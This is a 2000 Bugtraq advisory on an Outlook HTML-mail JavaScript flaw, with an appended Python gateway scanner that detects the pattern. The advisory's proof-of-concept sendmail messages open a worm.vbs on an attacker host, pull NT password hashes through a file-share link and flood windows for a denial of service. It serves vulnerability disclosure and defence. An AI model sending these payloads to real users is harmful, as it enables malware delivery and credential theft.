Bugtraq mailing list archives
Microsoft Outlook Malicious URL Vulnerability
From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Fri, 9 Jun 2000 09:29:26 -0800
[ Microsoft Outlook Malicious URL Vulnerability ]
[ cassius () hushmail com ]

[ Description ]

Outlook HTML messages with embedded JavaScript window.open() calls can automatically open malicious URLs. An attacker could use this vulnerability to make it appear that the user has received an attachment that has passed all SMTP scanners. The risk here is high, as this vulnerability could allow another 'ILoveYou' type virus to propagate with minimal resistance.

This vulnerability also opens Outlook and possibly other HTML/JavaScript enabled E-mail clients to a variety of other malicious URL attacks. Examples of possible attacks seem to be endless. We have been able to send messages that, when opened, automatically send an NT user's password hash to a box running L0phtCrack ( http://www.l0pht.com ) in SMB packet capture mode. This is a variation on a known attack that relies on social engineering to get the victim to click on a link within the message.

We have tested the following exploits against Outlook 2000 and Outlook Express. Suppose all versions that allow HTML messages with embedded JavaScript are vulnerable. Outlook 2000 is not vulnerable when the message is viewed in the preview pane or if the Outlook Security Update has been installed.

The solution for Outlook 98/2000 users is to install the Outlook E-mail Security Update. Outlook Express users should upgrade to Outlook 2000 or some other mail client.

[ Proof of Concept ]

The following examples use Sendmail to craft the messages. Outlook does not normally give you enough control of HTML message source to send these messages.

Example 1 - Sending Fake Attachments

% sendmail victim () example com
MIME-Version: 1.0
Content-Type: text/html
Subject: I love you not.

<html><script language="JavaScript"><!--
window.open('http://evilcomputer.example.com/worm.vbs');
--></script>I have attached a file for you.</html>
.
When the victim opens the message an IE dialog box is displayed that prompts the user to open the file or download it. An unsuspecting user could be tricked into thinking that this 'attachment' has passed all SMTP security scans.

Example 2 - Requesting NT Password Hashes

Set up L0phtCrack to sniff SMB packets on evilcomputer. Then send the following message.

% sendmail victim () example com
MIME-Version: 1.0
Content-Type: text/html
Subject: Give me your hash.

<html><script language="JavaScript"><!--
window.open('file:////evilcomputer/sharename/thankyou.html');
--></script>Blah blah blah.</html>
.

Example 3 - Annoying DoS Attack

% sendmail victim () example com
MIME-Version: 1.0
Content-Type: text/html
Subject: b00m!

<html><script language="JavaScript"><!--
for (loop=0; loop < 1000; loop++) {
window.open('about:<b><h1>Die!');
}
--></script></html>
.

[ Disclaimer ]

The information contained in this advisory is believed to be accurate at the time of printing, but no representation or warranty is given, express or implied, as to its accuracy or completeness. Neither the author nor the publisher accepts any liability whatsoever for any direct, indirect or consequential loss or damage arising in any way from any use of, or reliance placed on, this information for any purpose.
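A mail-gateway check for the pattern shared by the three proof-of-concept messages, given here as an added example that is not part of the original advisory: it flags any text/html part carrying a script element and classifies each window.open() target. The function names, finding labels and the SAMPLE message (modelled on Example 2) are assumptions made for illustration.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser

OPEN_RE = re.compile(r"""window\.open\(\s*(['"])(.*?)\1""", re.S)  # window.open('<target>')

class ScriptCollector(HTMLParser):
    """Collects the raw text of every <script> element."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        self.in_script = tag == "script"
        if self.in_script:
            self.scripts.append("")
    def handle_endtag(self, tag):
        self.in_script = False
    def handle_data(self, data):
        if self.in_script:  # script content arrives as plain data, tags inside are not parsed
            self.scripts[-1] += data

def classify(target):
    t = target.strip().lower()
    if t.startswith(("file:", "\\\\")):
        return "file-or-unc"   # Example 2 pattern: client connects to a file share
    if t.startswith(("http:", "https:", "ftp:")):
        return "remote-url"    # Example 1 pattern: remote file offered as a download
    return "other"             # e.g. the about: target in Example 3

def scan_message(raw):
    """Return (finding, detail) tuples for one RFC 822 message string."""
    findings = []
    for part in message_from_string(raw, policy=policy.default).walk():
        if part.get_content_type() == "text/html":
            collector = ScriptCollector()
            collector.feed(part.get_content())
            collector.close()
            for script in collector.scripts:
                findings.append(("script-in-html-mail", len(script)))
                findings += [(classify(t), t) for _, t in OPEN_RE.findall(script)]
    return findings

SAMPLE = (  # constructed sample, modelled on Example 2 of the advisory
    "MIME-Version: 1.0\nContent-Type: text/html\nSubject: Give me your hash.\n\n"
    '<html><script language="JavaScript"><!--\n'
    "window.open('file:////evilcomputer/sharename/thankyou.html');\n"
    "--></script>Blah blah blah.</html>\n"
)

print(scan_message(SAMPLE))
```

A gateway would normally quarantine or strip on the first finding alone, since script has no legitimate role in mail; the target classification is there to help triage.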